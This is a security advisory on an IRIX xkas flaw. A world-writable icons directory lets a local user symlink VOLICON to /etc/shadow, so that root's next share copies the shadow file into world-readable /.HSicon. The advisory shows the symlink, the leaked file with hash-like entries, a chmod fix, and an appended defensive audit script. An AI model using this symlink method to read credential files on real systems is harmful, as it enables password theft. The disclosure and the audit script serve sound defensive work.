=============================================================================
[ Hackerslab bug_paper ] Xkas application vulnerability
=============================================================================

File   : /usr/etc/appletalk/xkas application
SYSTEM : tested irix 6.5

INFO :

Xkas is a server administration tool for AppleShare. Misconfiguration by the
user with root privilege could lead to a serious security vulnerability.

A .HSResource directory and a .HSicon file are created whenever a directory is
shared. The .HSicon file is created by copying /var/adm/appletalk/icons/VOLICON.
The problem is that the permissions of the /var/adm/appletalk/icons directory
are set to 777 (world-writable), so any local user can replace VOLICON with a
symbolic link to the file they want, like the following:

$ ls -al /var/adm/appletalk/icons
total 8
drwxrwxrwx    4 root     sys           57 Jan 25 03:12 .
drwxr-xr-x    6 root     sys         4096 Jan 24 16:05 ..
drwxr-xr-x    2 root     sys            9 Jan 25 03:12 .HSResource
lrwxr-xr-x    1 loveyou  user          11 Jan 25 03:05 VOLICON -> /etc/shadow

When the administrator then uses /usr/etc/appletalk/xkas to share the root
directory, the following files are created in the root directory. Because
xkas runs as root, the copy follows the link, and the contents of /etc/shadow
end up in the world-readable /.HSicon:

$ ls -al /
total 17099
drwxr-xr-x   37 root     sys         4096 Jan 25 03:30 .
drwxr-xr-x   37 root     sys         4096 Jan 25 03:30 ..
drwxr-xr-x    2 root     sys            9 Jan 25 03:30 .HSResource
-rw-r--r--    1 root     sys          786 Jan 25 03:30 .HSicon
(etc..)

$ cat /.HSicon
root:y7floveyous30I:10908::::::
bin:yxaiFduxixe8s:11127::::::
uucp:*:11127::::::
sys:*:11127::::::
adm:*:11127::::::
loveyou:mXaa2jxi/ejY:10877::::::
(etc..)

SOLUTION :

Remove the other-write permission from the icons directory, then contact your
vendor and get a patch.

$ su -
# chmod o-w /var/adm/appletalk/icons

==-------------------------------------------------------------------------==
Kim Yong-Jun
loveyou@hackerslab.org
[ http://www.hackerslab.org ]
HACKERSLAB (C) since 1999
==-------------------------------------------------------------------------==
Yong-Jun
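The following is an added audit-and-remediation helper for the SOLUTION above; it is example code written for this page, not part of the original advisory or of IRIX. It checks an icons directory for the two conditions the advisory describes (an other-writable directory, and a VOLICON entry that is a symbolic link rather than a regular file) and applies the advisory's chmod o-w fix. It goes one step beyond the advisory by also removing a VOLICON that is a symbolic link, so the next share cannot copy the link target. It assumes a POSIX sh with ls, cut, sed and chmod; the function names check_icons_dir and fix_icons_dir are hypothetical, and the directory is a parameter so the script can be run against a constructed test directory as well as /var/adm/appletalk/icons.

```shell
#!/bin/sh
# Added example (not from the advisory): audit a VOLICON icons directory
# the way an administrator would before sharing a volume with xkas.
# Assumes POSIX sh plus ls, cut, sed and chmod.

# check_icons_dir DIR
# Prints each finding; returns 0 when there is nothing to report, 1 otherwise.
check_icons_dir() {
    dir=$1
    rc=0
    if [ ! -d "$dir" ]; then
        echo "ERROR: $dir is not a directory"
        return 1
    fi
    # The first 10 characters of 'ls -ld' are the type and mode bits;
    # the 9th character is the other-write bit (the 777 problem).
    mode=$(ls -ld "$dir" | cut -c1-10)
    case "$mode" in
        ????????w?)
            echo "FINDING: $dir is world-writable ($mode); any local user can replace VOLICON"
            rc=1 ;;
    esac
    # VOLICON must be a regular file: xkas copies it into .HSicon as root,
    # so a symbolic link would make it copy the link target instead.
    if [ -L "$dir/VOLICON" ]; then
        target=$(ls -l "$dir/VOLICON" | sed 's/.* -> //')
        echo "FINDING: $dir/VOLICON is a symbolic link to $target"
        rc=1
    elif [ -e "$dir/VOLICON" ] && [ ! -f "$dir/VOLICON" ]; then
        echo "FINDING: $dir/VOLICON is not a regular file"
        rc=1
    fi
    return $rc
}

# fix_icons_dir DIR
# Applies the advisory's fix (chmod o-w) and removes a VOLICON that is a
# symbolic link. Must run as root on a real system. Returns 0 on success.
fix_icons_dir() {
    dir=$1
    chmod o-w "$dir" || return 1
    if [ -L "$dir/VOLICON" ]; then
        rm -f "$dir/VOLICON" || return 1
        echo "removed symbolic link $dir/VOLICON; restore VOLICON from vendor media"
    fi
    return 0
}

# Usage: sh audit_icons.sh /var/adm/appletalk/icons
if [ $# -gt 0 ]; then
    check_icons_dir "$1" || echo "remediate with: fix_icons_dir $1 (as root)"
fi
```

The check only reports; the fix is a separate function so the audit can be run by an unprivileged user and the chmod applied deliberately as root, matching the su - / chmod sequence in the advisory.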